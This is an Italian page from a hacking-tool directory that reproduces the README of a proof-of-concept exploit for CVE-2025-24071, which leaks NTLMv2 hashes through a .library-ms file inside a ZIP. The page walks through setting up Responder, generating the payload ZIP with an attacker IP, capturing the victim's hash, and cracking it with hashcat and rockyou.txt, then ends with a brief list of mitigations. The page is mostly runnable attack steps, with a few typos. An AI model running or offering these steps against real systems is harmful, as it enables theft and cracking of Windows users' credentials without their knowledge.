Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-24071-POC-NTLMHashDisclosure- — CVE-2025-24071: Divulgazione dell'hash NTLMv2 tramite file .library-ms | Kitploit
Strumenti/GitHubGitHub/deshanfer94/cve-2025-24071-poc-ntlmhashdisclosure-
Password CrackingRicognizioneAnalisi delle VulnerabilitàExploitRaccolta InformazioniRed Teaming
GitHubdeshanfer94/cve-2025-24071-poc-ntlmhashdisclosure-

CVE-2025-24071-POC-NTLMHashDisclosure-

CVE-2025-24071: Divulgazione dell'hash NTLMv2 tramite file .library-ms

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
11 anno faNon ancora revisionato

CVE-2025-24071-POC-NTLMHashDisclosure

  • Attiva l'autenticazione SMB automatica verso una condivisione controllata dall'attaccante.
  • Nessuna interazione richiesta — Esplora file di Windows avvia questa autenticazione NTLM automaticamente.
  • Comporta la divulgazione dell'hash NTLMv2 (information disclosure).
  • Interessa Windows 10/11 in tutte le versioni, in particolare la 11 23H2.

Configura l'ambiente dell'attaccante

sudo apt update && sudo apt install responder -y

Avvia Responder

sudo responder -I eth0

Esegui lo script di exploit

Installa il modulo Python richiesto

pip install colorama python3 CVE-2025-24071.py -i <attacker_ip> -n testpayload -o ./output --keep

Questo genererà: testpayload.library-ms testpayload.zip

Test sulla macchina vittima

Trasferisci testpayload.zip sulla macchina di test Windows 11. Estrai lo ZIP usando Esplora file di Windows. Questo induce Windows a tentare di accedere al percorso SMB, divulgando l'hash NTLM.

Cattura l'hash

responder -I etho0

Image

Prepara il file dell'hash

crea il file hash,txt

victim::DOMAIN:1122334455667788:11223344556677889900aabbccddeeff:01010000000000000090d5d00f3

Scegli una wordlist

la più comune è rockyou.txt

Esegui Hashcat

hashcat -m 5600 -a 0 -o cracked.txt hash.txt /usr/share/wordlists/rockyou.txt

Image

Mitigazione

  • Blocca l'SMB in uscita (TCP 445) sui firewall.
  • Disabilita l'autenticazione automatica verso condivisioni SMB non attendibili (criteri di gruppo).
  • Monitora l'estrazione di file .library-ms e le connessioni SMB.
Scarica lo strumento